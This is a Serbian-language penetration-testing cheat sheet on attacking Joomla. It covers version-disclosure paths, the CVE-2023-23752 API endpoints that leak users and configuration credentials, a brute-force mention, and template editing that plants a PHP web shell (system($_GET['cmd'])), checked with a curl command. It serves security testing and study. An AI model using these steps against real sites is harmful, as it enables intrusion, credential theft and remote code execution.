Joomla
Joomla Statistika
Joomla prikuplja neke anonimne statistike korišćenja kao što su raspodela verzija Joomla, PHP i baza podataka i operativnih sistema servera koji se koriste na Joomla instalacijama. Ovi podaci mogu biti upitani putem njihovog javnog API-ja.
Enumeracija
Otkrivanje/Pratilac
Proverite meta
robots.txt
README.txt
Verzija
U /administrator/manifests/files/joomla.xml možete videti verziju.
U /language/en-GB/en-GB.xml možete dobiti verziju Joomla.
U plugins/system/cache/cache.xml možete videti približnu verziju.
API Neautentifikovano Otkrivanje Informacija:
Verzije od 4.0.0 do 4.2.7 su ranjive na neautentifikovano otkrivanje informacija (CVE-2023-23752) koje će izbaciti kredencijale i druge informacije.
Korisnici:
http://<host>/api/v1/users?public=true
Konfiguracioni fajl:
http://<host>/api/index.php/v1/config/application?public=true
MSF Modul: scanner/http/joomla_api_improper_access_checks
ili ruby skripta: 51334
Brute-Force
Možete koristiti ovaj skript da pokušate da izvršite brute force login.
RCE
Ako ste uspeli da dobijete admin pristupne podatke možete izvršiti udaljeni kod dodavanjem isečka PHP koda kako biste dobili RCE. To možemo uraditi prilagođavanjem šablona.
Kliknite na
Templates
na dnu leve strane ispodConfiguration
kako biste otvorili meni sa šablonima.Kliknite na ime šablona. Izaberimo
protostar
podTemplate
zaglavljem. To će nas odvesti na stranicuTemplates: Customise
.Na kraju, možete kliknuti na stranicu da otvorite izvorni kod stranice. Izaberimo stranicu
error.php
. Dodajmo PHP jednolinijski kod za izvršenje koda na sledeći način:system($_GET['cmd']);
Sačuvajte & Zatvorite
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated